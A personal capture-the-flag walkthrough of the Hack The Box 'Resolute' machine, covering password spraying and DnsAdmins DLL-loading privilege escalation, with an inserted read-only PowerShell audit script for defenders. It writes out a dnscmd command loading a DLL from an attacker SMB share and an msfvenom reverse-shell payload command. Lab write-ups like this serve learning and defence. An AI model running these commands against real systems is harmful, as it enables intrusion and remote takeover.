HTB - Resolute
So I finally rooted Resolute... Quite ashamed at myself though: I really don’t think I’d have taken so long on it if I knew Windows better... xD
Long story short: I completely misunderstood the output of the whoami /groups command. I thought it showed possible user groups, but it instead shows the groups of the logged-in user (fml one million times over...)
RIGHT THERE... IT LITERALLY TELLS YOU THAT RYAN IS A DNSADMIN... JDKWFJFIF. X’D
Anyways, with self loathing ever so present, I’ll now walkthrough Resolute.
A run-through of my enum script shows the presence of the default password Welcome123! (from enum4linux) for user Marko. While this password doesn't work for Marko, it does turn out to be the correct password for user Melanie: a simple password-spraying attack, the same concept as it would be against any other service. :)
After establishing a connection through Evil-WinRM, we can see that the only other users with their own directories are ryan, Administrator and Melanie (along with the defaults like Public etc.)
Logically, our goal is going to be Ryan first. It actually took me a while to find Ryan’s password in C:\PSTranscripts... Didn’t do well with Resolute at all, perhaps because it was one of my first Windows machines? :’)
Once you have access as Ryan, simple enumeration actually reveals that you’re a DnsAdmin and that the DNS process is running... If I’d known about being DnsAdmin I don’t think this machine would have taken me long at all. -.-
Upon this discovery, you can simply have the DNS service load a DLL of your choosing, i.e. "DLL injection" into the DNS process (https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2 describes this process well).
*Evil-WinRM* PS C:\Users\ryan> dnscmd RESOLUTE /config /serverlevelplugindll "\\10.10.X.X\hehe\r.dll"
Registry property serverlevelplugindll successfully reset. Command completed successfully.
*Evil-WinRM* PS C:\Users\ryan> sc.exe stop dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan> sc.exe stop dns
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\ryan> sc.exe start dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2224
        FLAGS
I generated the DLL with msfvenom (msfvenom -p windows/x64/shell_reverse_tcp LPORT=6969 LHOST=10.10.X.X -f dll > r.dll) and started an SMB server using Impacket’s smbserver.py.
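As the defender-side counterpart to the dnscmd step above, here is an audit script I'm adding (mine, not from the writeup or any tool mentioned in it) that reports the three things this chain depends on: the ServerLevelPluginDll registry value, who is in DnsAdmins, and the state of the DNS service. It assumes it runs on the DNS server with local admin rights and that the ActiveDirectory RSAT module is installed for the group lookup; it only reads, never changes anything.

```powershell
# Added audit script, not part of the original writeup. Assumes it runs on the DNS
# server with local admin rights and that the ActiveDirectory module is present
# for the group check (assumption). Report-only: it changes nothing.
$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-ServerLevelPluginDllFinding {
    $dll = (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll `
            -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if ([string]::IsNullOrWhiteSpace($dll)) {
        return [pscustomobject]@{ Check = 'ServerLevelPluginDll'; Value = ''; Severity = 'OK' }
    }
    # The value is empty on a default install, so any path deserves a look. A UNC path
    # (the writeup points it at \\<attacker>\share\r.dll) means dns.exe, which runs as
    # SYSTEM, will fetch and load code from a network share on its next start.
    $severity = if ($dll.StartsWith('\\')) { 'CRITICAL' } else { 'HIGH' }
    [pscustomobject]@{ Check = 'ServerLevelPluginDll'; Value = $dll; Severity = $severity }
}

function Get-DnsAdminsFinding {
    try {
        $members = @(Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
                     Select-Object -ExpandProperty SamAccountName)
    } catch {
        return [pscustomobject]@{ Check = 'DnsAdmins'; Value = "lookup failed: $_"; Severity = 'UNKNOWN' }
    }
    # Anyone listed here can point the DNS service at an arbitrary DLL with dnscmd,
    # exactly as the writeup shows, so each member needs a justification.
    $severity = if ($members.Count -gt 0) { 'REVIEW' } else { 'OK' }
    [pscustomobject]@{ Check = 'DnsAdmins'; Value = ($members -join ', '); Severity = $severity }
}

function Get-DnsServiceFinding {
    $svc = Get-Service -Name DNS -ErrorAction SilentlyContinue
    $state = if ($svc) { "$($svc.Status)" } else { 'not installed' }
    [pscustomobject]@{ Check = 'DNS service'; Value = $state; Severity = 'INFO' }
}

@(Get-ServerLevelPluginDllFinding; Get-DnsAdminsFinding; Get-DnsServiceFinding) |
    Format-Table -AutoSize
```

If the first check fires, clearing the value is `Remove-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll` followed by a restart of the DNS service, and the DnsAdmins membership should be reviewed at the same time.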
This was eye-opening, tbh: I feel it was such a simple machine, but I royally screwed up at a couple of points. Like I mentioned, my misunderstanding of whoami /groups led me down a rabbit hole for weeks, which is why I took a mini break and did a couple of other machines in the meantime.
I was back on track after running windows-privesc-check.exe by PentestMonkey (https://github.com/pentestmonkey/windows-privesc-check): it gave me the idea of DLL hijacking, since applications may load the DLLs they need from the current working directory (pwd).
I then encountered DNS as a running process and by chance came across this method of privilege escalation when Googling privesc through the DNS process.